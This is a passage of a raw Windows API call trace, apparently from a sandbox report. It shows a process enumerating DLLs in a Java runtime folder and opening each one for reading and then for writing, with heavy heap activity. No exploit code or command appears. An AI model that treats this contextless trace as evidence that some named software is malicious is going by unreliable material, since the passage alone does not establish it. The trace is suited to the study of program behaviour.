returned 0x883b0 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.001] AreFileApisANSI () returned 1 [0091.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46b38 [0091.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 49 [0091.001] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x40e40)) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0091.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.002] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="glib-lite.dll", cAlternateFileName="GLIB-L~1.DLL")) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0091.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0091.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.002] AreFileApisANSI () returned 1 [0091.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll", lpUsedDefaultChar=0x0) returned 53 [0091.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0091.003] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.003] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0091.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.003] AreFileApisANSI () returned 1 [0091.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0091.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 53 [0091.003] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.003] GetFileType (hFile=0x418) returned 0x1 [0091.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0091.003] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.003] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.004] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.004] CloseHandle (hObject=0x418) returned 1 [0091.004] AreFileApisANSI () returned 1 [0091.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0091.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 53 [0091.004] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.004] GetFileType (hFile=0x418) returned 0x1 [0091.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0091.004] CloseHandle (hObject=0x418) returned 1 [0091.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.005] AreFileApisANSI () returned 1 [0091.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75eb8 [0091.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll") returned 53 [0091.006] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f440)) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0091.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.006] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.006] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x97440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="gstreamer-lite.dll", cAlternateFileName="GSTREA~1.DLL")) returned 1 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0091.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0091.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0091.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0091.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0091.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0091.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0091.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.007] AreFileApisANSI () returned 1 [0091.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll", lpUsedDefaultChar=0x0) returned 58 [0091.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0091.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0091.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.007] AreFileApisANSI () returned 1 [0091.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0091.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0091.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 58 [0091.007] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.008] GetFileType (hFile=0x418) returned 0x1 [0091.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0091.008] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.008] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.009] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.009] CloseHandle (hObject=0x418) returned 1 [0091.009] AreFileApisANSI () returned 1 [0091.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0091.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0091.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 58 [0091.009] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.009] GetFileType (hFile=0x418) returned 0x1 [0091.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0091.009] CloseHandle (hObject=0x418) returned 1 [0091.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 